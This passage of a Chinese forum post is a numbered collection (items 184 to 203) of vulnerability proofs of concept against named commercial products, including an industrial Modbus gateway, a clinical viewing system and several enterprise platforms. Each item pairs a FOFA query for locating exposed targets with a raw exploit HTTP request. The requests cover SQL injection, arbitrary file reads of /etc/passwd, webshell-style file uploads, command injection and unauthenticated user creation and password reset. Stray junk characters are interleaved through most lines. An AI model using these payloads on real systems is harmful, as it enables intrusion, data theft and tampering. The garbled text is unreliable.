7 ^  }! ]  W8 o6 s4 \- `/ wAccept-Encoding: gzip, deflate5 \* X) }4 E3 o" C6 J) B
Connection: close+ \- m$ Q1 ^( E/ t9 E4 r% m4 E

) G% D5 b4 J: ?, r5 i4 N2 s/ F! a9 E3 z+ `( j. e: @
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 Z9 r* v* a3 S5 v8 S
FOFA:server="SunFull-Webs": C0 {5 O3 E) M" Q
POST /soap/AddUser HTTP/1.1* s& O) ?) H7 b, R6 V1 }0 F' r
Host: your-ip
1 H- D$ m& L* e, b6 hAccept-Encoding: gzip, deflate& s8 A  ^& H6 _+ r5 [6 Q( \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# B4 G6 M( q! Y( x* {. ~
Accept: application/xml, text/xml, */*; q=0.01. T! x' ]0 F/ ?% U
Content-Type: text/xml; charset=utf-8
) ~, U# Q2 }# f4 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 v0 B" U3 ?. ~5 kX-Requested-With: XMLHttpRequest
2 v# F2 g! J- [* r' n" e0 u: ?6 {) E
! V7 U2 B2 ^- Q8 D( g# v+ Y- E/ R
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
- B6 m# ^' z. @) n
7 u2 w3 N+ x* n, Y- h! v8 K
) `. t/ d6 a0 |# y% a1 t185. 瑞友天翼应用虚拟化系统SQL注入
: v% w* E3 X% W+ x9 F  H2 oversion < 7.0.5.1
2 U: j; b7 q! C4 L. X. O0 uFOFA:app="REALOR-天翼应用虚拟化系统"' J, I4 v2 A; y- n$ J1 i0 Z
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
1 q- C1 l$ t4 Y  n; Z2 uHost: host
* K* v! o* k: |  m  ^& E3 s2 L& W+ P; x. l% Y. e" w* j5 E

, X$ U# l  U5 a; t2 {186. F-logic DataCube3 SQL注入4 v/ |: G* k" H
CVE-2024-31750
0 ~/ d) o( v8 R) W  vF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
* [5 @4 m2 v+ ?9 WFOFA:title=="DataCube3"! d  X, G! F. X( ^- P7 z3 C, E; o
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1$ H' n# y& U. Q, E
Host: your-ip) s% }+ Y- X* y/ P+ X  O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" S0 Q+ r; j; X% D' w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
6 g% d/ u& H- S1 @) [) D/ SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  F  ]% J' R7 T4 _" C) o. IAccept-Encoding: gzip, deflate
- e. L! {% ~1 e( e/ qConnection: close# F+ Z# K$ W' b5 O1 O9 W
Content-Type: application/x-www-form-urlencoded
6 F, K/ e, M0 ?4 r0 j5 }) o0 F3 T) }4 ^% B. p
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
4 o* i0 {* h: ~% I% u# p8 z# ]& Q2 K; P! @" ^  H3 Z& f

0 i1 c+ ]7 f+ C- t8 G3 r187. Mura CMS processAsyncObject SQL注入
4 s0 n/ `; O- P6 H: N% ?3 }7 Z0 |CVE-2024-32640. s. S6 _+ _& u9 A8 e
FOFA:"Mura CMS"
- u% T7 H: \  X8 J$ G3 O7 ]" XPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 I3 F. T! I& u+ r  s  T- x, kHost: your-ip# Z, C" T5 ?/ C: I
Content-Type: application/x-www-form-urlencoded8 }0 E8 {% ~4 ]0 J
4 m2 F+ q- V) n( g3 k
* v3 O1 z7 V5 K4 j" U5 t
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1) W5 g! b& P8 e6 |

- ?* U* c8 z6 e/ q4 G- J% x1 R, p. M6 h
188. 叁体-佳会视频会议 attachment 任意文件读取
0 d  n6 v6 A( T( p* zversion <= 3.9.79 ?2 _8 X5 ]7 M! x! C
FOFA:body="/system/get_rtc_user_defined_info?site_id"8 \% z7 G' n- |/ L  s' `
GET /attachment?file=/etc/passwd HTTP/1.1
  R& y- F4 k7 \/ B6 P; pHost: your-ip$ X2 A& B4 _7 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ D* [# u; C) K6 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& A: K. D9 Z. G4 O# {Accept-Encoding: gzip, deflate
% B, b- t+ I/ Y: s3 ^  V3 p2 xAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 C; U* W4 E  {1 s! aConnection: close" c8 p9 q& Y( v: \4 e' o+ Q! `- e
$ z7 ?$ D1 S, d1 {
. H* f- X( ?0 ?" R  l) E+ ^
189. 蓝网科技临床浏览系统 deleteStudy SQL注入! T' ~8 R) ^; O( J& [. E* Q
FOFA:app="LANWON-临床浏览系统"7 K7 y! H* T8 U
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1# ?  e2 G# S8 Y
Host: your-ip
+ z- N  u# ^# S. b  `$ y" X, c+ HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) ?: x' _4 ^8 Z" iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ e( N' f  n. C: U, ?* O/ r$ E
Accept-Encoding: gzip, deflate
% ^% m+ y3 B: q4 x# {5 N, LAccept-Language: zh-CN,zh;q=0.9! k. ~, P$ E7 l, p
Connection: close( c7 L  q- A2 m! n2 W0 P

: }0 y2 x. z! ^, o. B  g$ p. u9 ^6 A- Y9 H( `" g# ~* q6 b
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ R! s2 X- j4 ~- YFOFA:title=="短视频矩阵营销系统") h+ g( k4 O4 A2 o4 [6 X* |8 o
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
( }: I. H& D( {, E. W$ N6 IHost: your-ip
$ v4 h4 r+ T& m5 C# ^; n; @6 B3 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36* [8 R9 k" l1 F2 z. j+ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! a/ S1 X  u) M* `/ f7 W
Content-Type: application/x-www-form-urlencoded' R- T! i' i7 g
Accept-Encoding: gzip, deflate0 H( B9 T$ l# g, h; p$ u
Accept-Language: zh-CN,zh;q=0.9
; z7 H& n, C# k+ C  J/ A* V" l+ G/ I' P2 _1 X, t4 z( v
poi=file:///etc/passwd
% z$ h' O3 \2 X3 q/ B  M7 l. _( x% p$ a8 U9 Z1 e0 E4 t3 ^/ e
- C. G; d( n( r2 t0 {; `6 Q* d
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
) k; d7 @; G+ \8 [' u/ XFOFA:body="/CDGServer3/index.jsp"2 D( k, v* P/ c4 V
POST /CDGServer3/js/../NavigationAjax HTTP/1.1$ e: ]* U: V' o' `& w+ a6 P
Host: your-ip
; `0 L$ D" A+ Y8 a2 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! G( L2 }; x  M! L! X' X
Content-Type: application/x-www-form-urlencoded, y! l- l+ @( k" e0 e
/ w& N- L* H- y8 N, B( X  ^
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
0 E. N5 S% }# c- ?3 v- x9 g: Q9 q0 ]" E/ A- P% U$ U- ]' ~  l% E

0 z& W/ L% B) c( z+ r6 S  v192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
4 }6 [1 u+ v8 J) b! mFOFA:title="用户登录_富通天下外贸ERP"( g  y% \9 M7 b/ l  _8 O% i
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
% S$ z5 U- b* q; Q, g* NHost: your-ip
2 u+ |( D. L2 \- c5 b+ ]2 N& dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- d" P* y, a7 d
Content-Type: application/x-www-form-urlencoded
4 d! b% k0 l% P$ H$ g. N( \9 I
( A+ y6 |. m8 Z7 }5 ]+ g( p% |6 @
: C, y9 |9 w# R3 I* ^. |<% @ webhandler language="C#" class="AverageHandler" %>; m, [& Q" Y2 ?2 M. d
using System;
" Y: q1 }' J( L: n- N5 G! vusing System.Web;
  G7 ^: s5 W! M; W, W; ~8 C! Q; ipublic class AverageHandler : IHttpHandler3 F: Z! q/ x0 h; k
{
: {! c9 o# X* U7 [  ^+ A; B- ^) I2 `# Dpublic bool IsReusable9 R1 r: K0 l( f) X7 Z
{ get { return true; } }- U7 O4 ?: V' J& u( X" C# {- g, Y. e& _
public void ProcessRequest(HttpContext ctx)* p( K3 ^1 m- i+ o
{: ?: L" B8 h" o- D$ l
ctx.Response.Write("test");
& r2 p7 n3 u8 U+ h0 T}
2 F  p+ T) k6 r  @& p. b4 J5 Q}8 x( ?6 @# M; B) x2 W

/ R: t  k* v4 D5 l  S6 q0 x
7 e2 D# L+ f0 S4 N7 g1 |( u193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
7 f7 w  q# T2 s, w% bFOFA:body="山石云鉴主机安全管理系统". t1 P2 b! E( g, U) E7 ^
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
. J' Z( O, @  m$ h( \& A: l! d+ BHost:
% x% e9 q/ q/ z. V# x! mCookie: PHPSESSID=2333333333333;( q, B, B/ w/ g. O
Content-Type: application/x-www-form-urlencoded
) R& K' N1 ^5 |! E0 T3 IUser-Agent: Mozilla/5.0
( ?, [! X  `* b" R0 S/ Z  E2 n% w8 y( v
4 m3 @4 @" _# M, Q5 |& M
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1# X& D0 r) R5 d, R/ S0 ]0 T. J
Host:$ U; p  r* F! A/ Z1 \$ P
User-Agent: Mozilla/5.0
8 |+ q2 }0 Q0 N7 S- {Accept-Encoding: gzip, deflate+ z6 J3 h$ ?0 s! i% q/ y, W
Accept: */*
3 \1 o( p  i8 [7 X) b6 x* GConnection: close/ C+ }/ L- C5 t9 m9 Y6 T
Cookie: PHPSESSID=2333333333333;
3 {0 a7 I1 p& _" |/ Q0 B; C: iContent-Type: application/x-www-form-urlencoded$ x! Y+ h( w1 J+ ?' Z* W9 [" R
Content-Length: 84
/ ?. S+ V- _; g: V- `! b9 \! z# V. L' u+ q+ ?0 I. A, f( D0 m9 q
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')5 z/ D) W% |: O" G  D! {6 U$ V5 D/ L

1 h3 N, c* F8 p+ \0 K; y- L
' |, i$ a& C3 ~1 M, U2 x5 jGET /master/img/config HTTP/1.1! \) _5 E& A$ w5 W7 T; E' J
Host:
1 J8 s- a7 T: |3 bUser-Agent: Mozilla/5.0) _1 }+ v- U4 ^1 d5 O+ F

# L" l# `1 D9 |/ e* _+ l
: J+ K. ?/ l+ h194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 I8 O  ^3 n5 E2 T9 |; j0 iFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
5 L; F5 B* Q, |9 ]0 D: y4 U, G: v1 W$ z$ c, N* g" k1 C
POST /servlet/uploadAttachmentServlet HTTP/1.1
( d3 n! I! ~6 F1 z2 V: EHost: host
2 z* d, @% U/ w4 _, V5 _) ?+ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
+ W/ n- K' W5 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ s; G4 b( A' q* B- g6 r: X- @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 j, [2 v* v6 A" l7 F
Accept-Encoding: gzip, deflate
6 ^# X5 J( H* B) D3 HConnection: close
' D) \& e4 ?6 J& k) W6 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 B0 u) f0 }  ?+ U3 c
------WebKitFormBoundaryKNt0t4vBe8cX9rZk) B2 x$ v/ \7 o1 I' |! M; R: \" y' H0 ?9 K; v
# V( {9 o- Z/ x! k0 P
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"  x; _3 }; a& d* h. T# [
Content-Type: text/plain6 {* z+ A4 V9 ]
<% out.println("hello");%>
; \$ X$ X2 h7 r1 I; l- R6 H------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 T9 S. x' n% s7 D7 z+ l
Content-Disposition: form-data; name="json"3 V2 P4 z. G2 a1 o' u& c+ w
{"iq":{"query":{"UpdateType":"mail"}}}
3 l, _0 n: c, H4 `$ k- M------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
* ?: t; {0 g; \& P$ w
, s% g& k: l0 ~  i7 w* A& l, r4 k) ?, @, J! y
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" W/ l' R1 X9 i- Y; F' L
FOFA:title=="飞鱼星企业级智能上网行为管理系统8 ~0 V4 G7 ^# [, g& u" n
POST /send_order.cgi?parameter=operation HTTP/1.15 ?8 W6 p* s2 G0 e1 C
Host: 127.0.0.1' L1 J1 w0 ~9 B( B; p
Pragma: no-cache
! ~2 ~6 D( t# G! n; c& K0 }Cache-Control: no-cache
0 D) x) w0 v+ \& Y: Y8 [  ?( GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: c0 p$ K. {2 {2 E- h: l% ?
Accept: */*
2 ]6 t, ^- J5 a% ]Accept-Encoding: gzip, deflate: q  t" A8 K) C! j1 W! }
Accept-Language: zh-CN,zh;q=0.9
$ D, p  D& {4 y7 J5 W9 aConnection: close
! F8 O& s. ?, k/ i6 d6 V" \& S$ HContent-Type: application/x-www-form-urlencoded/ G% g# I( {8 f* @# N5 U& a2 B
Content-Length: 68. J) K2 G) V1 x9 V) K) b$ w" v
  Q& V. U+ B  Z; k) Z" A, z. `
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}$ _( x/ @1 k# C, I: `- n

0 E% f, F" y- M5 a3 G) H+ t2 `. O' I2 N/ Q1 q
196. 河南省风速科技统一认证平台密码重置
; ]& A$ N' m# H/ R; m% R+ g/ BFOFA:body="/cas/themes/zbvc/js/jquery.min.js"1 `, \, \4 X& M% }. D: `' J
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
/ V* Z  h; }+ |) N1 ~9 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" X$ _: l" @" Q, _1 _
Content-Type: application/json;charset=UTF-8
6 o4 G+ r( C0 Q3 m. {X-Requested-With: XMLHttpRequest
) @' ]8 a' |0 V6 R$ _, \+ }Host:
* M8 y. k0 l, F' z! j* L  w: UAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.26 D4 j, S* d1 U# u& z# G
Content-Length: 45& x; P% W" r- R% o/ Y$ I
Connection: close4 @( L; d3 g4 c

4 x- x: U& ~& ~; V; {' N{"xgh":"test","newPass":"test666","email":""}. ~& ^% s# ?& N

2 b+ K$ Y$ Y3 l# p$ _7 I0 s  m4 l

3 H, v' s* m3 }0 o; `7 o& `9 U# k197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" i, H2 k6 v, ~( H  x+ d( MFOFA:app="浙大恩特客户资源管理系统": J& ]5 N2 E) c* y$ B" ^" c
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) J* A- G" V# n" ~* L$ |
Host:
# m) u4 o- g8 x5 v5 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36) p8 N# P. f" A4 `3 q/ _3 ~, E0 @/ C
Accept-Encoding: gzip, deflate  y$ m7 s/ c. i2 }1 P8 @" X
Connection: close7 m8 g8 `- @% [. B( t

! e+ l8 X/ o3 }2 E. [# b1 |. z  f1 \: K

0 V9 q8 q& \$ X! T; T3 j8 N6 T/ @198.  阿里云盘 WebDAV 命令注入
, I( M4 u) H$ c( t) H& ^CVE-2024-29640
) `: x1 C* ?1 s- s- k6 AGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
- S4 n: i# g8 b: O. uCookie: sysauth=41273cb2cffef0bb5d0653592624cf64- j& h" Z: n! \' Q! v+ n
Accept: */*
8 E. x6 \  ]1 A5 D9 ~Accept-Encoding: gzip, deflate* A$ `0 h* l* k% L0 n4 i9 ]. `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
: I- q2 p8 [5 K& T8 H0 b) ZConnection: close
7 P) i/ f  L& ]* P0 m* R5 e
9 W+ k1 E- A. _7 Z- J" G; y. O% B( I
199. cockpit系统assetsmanager_upload接口 文件上传, @  Y. ]' U; _3 Z8 ]& b
; |7 z. c; b7 Z5 J: e6 z
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
5 U( H5 M" K; ]GET /auth/login?to=/ HTTP/1.1
' i$ i2 l0 c# T. O9 }2 q, S$ E! z
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"( C) D6 y/ V1 o+ ^  e

+ @* X0 k/ A) |# c! I2.使用刚才上一步获取到的jwt获取cookie:% T6 I# o- |* N7 E1 h0 e& d7 Q/ ?

) x$ T. z5 u# S5 E8 LPOST /auth/check HTTP/1.1
% {' a$ B% V# A1 Y) jContent-Type: application/json
9 h! e+ ~" Y! l" _8 @0 l1 p+ |  \4 M1 u" D
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}: j3 M" E( I! w6 `
( j( |" b" v- `# `0 v
响应:200,返回值:
( q$ c: L& V8 u5 [; QSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
6 Y& f) [' V8 nFofa:title="Authenticate Please!"
6 m( A' @& ]+ A" HPOST /assetsmanager/upload HTTP/1.1
8 O( L6 a" E% ?6 KContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb35 ~% W/ n0 B! p
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
) u0 _# H: }4 y+ z* p& a- m
# J0 A! n7 j( @-----------------------------36D28FBc36bd6feE7Fb3
6 q9 q: D9 G% K8 l: d$ qContent-Disposition: form-data; name="files[]"; filename="tttt.php"" p. Z7 _- K, G. B) ^0 y/ {
Content-Type: text/php
8 |: P. @& ]4 {7 x/ U3 V1 Z
1 F/ t7 M, p0 y* i* I% ^<?php echo "tttt";unlink(__FILE__);?>7 l# w( m+ T- @/ F! M+ ?4 K
-----------------------------36D28FBc36bd6feE7Fb3, ]! g+ N+ G: R9 w3 y
Content-Disposition: form-data; name="folder"2 Y6 M4 K7 Q3 P1 Z5 ?% [
) g7 w: i6 M3 e5 ]$ ^: O1 p7 A
-----------------------------36D28FBc36bd6feE7Fb3--2 P+ w5 v" Y5 i# P, r( N2 b; ]

' y/ B: t# Z8 X/ O, y1 ?. x& [  B  C! C
/storage/uploads/tttt.php" T9 V8 L% q: W
0 @6 k4 [$ V) D* T% L. s& L
200. SeaCMS海洋影视管理系统dmku SQL注入
2 ]/ h+ C7 W* g, z. G# k4 O4 E4 QFOFA:app="海洋CMS"5 g5 a- C! X: `1 y
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
, G- F) d3 a5 [4 d' [Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
) c/ I& Y; k: B3 kUpgrade-Insecure-Requests: 10 T0 h" g+ X+ Z' ]; A$ z
Cache-Control: max-age=0
$ H; B2 X1 ^' L. G$ c- iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& E( o: D+ T# q4 B
Accept-Encoding: gzip, deflate& ]1 \3 G  U9 [5 v- h/ k
Accept-Language: zh-CN,zh;q=0.9
% q# @' h3 M0 \( d7 V1 z
/ B$ j/ j5 A9 x1 b- e0 |1 Q- H
" [) S/ U; i, p6 A7 T7 }; Y201. 方正全媒体新闻采编系统 binary SQL注入
$ j0 F& H+ a( T% RFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% l: `  B5 U6 s- K5 N8 C9 G, T. l7 o  @POST /newsedit/newsplan/task/binary.do HTTP/1.1
; o. t- }% ^* V) ^' D: }Content-Type: application/x-www-form-urlencoded
- [4 Q- m' x/ N" n  X2 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. U! x+ Q7 Y, @6 T
Accept-Encoding: gzip, deflate
% P" k% X& L( |) ?8 @, qAccept-Language: zh-CN,zh;q=0.97 y* `1 V. {. _6 w9 d/ L) w: d, d
Connection: close. v6 n: l9 B+ a) b

8 G8 G5 k5 r; a4 h" d& STableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1. h0 l6 `& X, L7 j1 i3 Z7 N) ?
: p- A: p  z6 w( C4 u: I

8 Z5 l4 }  ]& B, ?* e9 k202. 微擎系统 AccountEdit任意文件上传" ?9 {9 W$ D0 L9 ]
FOFA:body="/Widgets/WidgetCollection/"
+ X/ S1 z3 T- Z9 W获取__VIEWSTATE和__EVENTVALIDATION值3 P8 [. ^0 [1 B5 z1 r+ E) B2 e
GET /User/AccountEdit.aspx HTTP/1.1# _3 H7 X8 Q7 R- N, n
Host: 滑板人之家
9 ]9 {( ]& m  g: T0 Q$ L& mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31/ B4 y3 S9 I2 Z1 U+ F' r8 z) ?
Content-Length: 0
% j- Q$ d; l1 W  p; X0 b/ w- C* a& s  l
9 K+ D4 ~+ Q9 {8 R; c, ~5 v6 Q: n
替换__VIEWSTATE和__EVENTVALIDATION值
; Y& A; ^% y3 SPOST /User/AccountEdit.aspx HTTP/1.1
9 f. Q8 o1 g- }; h3 WAccept-Encoding: gzip, deflate, br
! h, h# t4 f3 c8 M3 P- f2 sContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687  p7 q, K% V0 U8 L
3 W( n2 v! J- Q' r# J) E3 [9 ~
-----------------------------786435874t385875938657365873465673587356870 O1 Z; n$ F+ Z& Q7 J1 C
Content-Disposition: form-data; name="__VIEWSTATE"6 I: J# v) [# l' \+ v9 t  d

. [& _& O+ a0 O1 {: k/ e" W__VIEWSTATE: @3 w# |$ z# p  ?4 R
-----------------------------786435874t38587593865736587346567358735687
2 |0 P3 t2 X8 ^0 a6 w# y0 cContent-Disposition: form-data; name="__EVENTVALIDATION"
& O. G  p- Y4 L8 C9 {" r7 {* Y- }( P7 S9 Y; l
__EVENTVALIDATION
6 |- i5 {" h: ]-----------------------------786435874t38587593865736587346567358735687' }8 Y$ c) m8 m7 O3 T( g
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
& i) o; N* h+ ~+ V% SContent-Type: text/plain
+ W% s1 h/ P4 y7 c1 b. c) v( G, \7 v. \
Hello World!7 D% N! m9 @3 e/ J5 g' y4 S# b
-----------------------------786435874t38587593865736587346567358735687
+ S: V, P2 [/ d/ @/ D" W. DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"& x" V: @( \0 L+ ?
4 _3 C" K1 Z9 R7 G4 D
上传图片2 c$ ?7 m/ J2 j+ @0 Y
-----------------------------786435874t38587593865736587346567358735687) V$ {; v6 ?, q) L* ?
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( O# X& {! q; ^! y. t
9 b2 M  x9 f7 h7 V  N6 T. E% U5 T$ ^+ L0 x
-----------------------------786435874t385875938657365873465673587356876 T# E8 g( B5 l, a) X1 e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"- f. }1 U' w3 b2 f$ O5 i) }

; \& p# @' D4 F) H. M  U
! K- c8 I1 q  J, N-----------------------------786435874t38587593865736587346567358735687--% ~( b8 K1 U. F: J' ]

8 m2 Y+ P) ^) k. U7 k# X, F/ o3 Z* P4 x! o8 {) W- D( [" b
/_data/Uploads/1123.txt
, h/ f' u* U7 Z6 s. f6 u! J) e0 p
0 Z3 g3 Y: J, Y203. 红海云EHR PtFjk 文件上传: x9 v' F6 Y' G4 O) _, V0 t1 \
FOFA:body="RedseaPlatform"
/ t4 s; y$ ~  `8 D/ |1 m- |- zPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1* y4 b. t& T. t8 \
Host: x.x.x.x
1 R- E* I- ]/ sAccept-Encoding: gzip
1 i0 y( H( ~0 j& x& s# P& UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# i( y0 f) i) a- Y8 _. F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 ?+ L7 p- ]) ^7 p. C" b
Content-Length: 2104 F9 ^4 k6 m$ e0 i  S
3 M& E* u! m; m- ^' T
------WebKitFormBoundaryt7WbDl1tXogoZys4, ^0 o2 w# l# W5 j0 I& v2 p
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
6 O8 H. |' c: mContent-Type:image/jpeg
+ m, N+ r- I$ o' _  [( G1 V
$ V" f$ D( @$ o) P+ E<% out.print("hello,eHR");%>  z: I7 y( C# a7 Z. {
------WebKitFormBoundaryt7WbDl1tXogoZys4--
3 X8 O7 v: \( P5 o, s; [$ [. M/ s* w  T+ F& d- S9 d, A
8 ]/ u6 {- _0 K0 S0 V$ r

. k0 \3 F! G8 Z2 K8 c* R; w
. z& X: v  W0 Y* X9 T- W# Q3 S8 Y  V" i# o; W: k/ i

' h- M7 d# ~8 H( d7 s6 A8 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表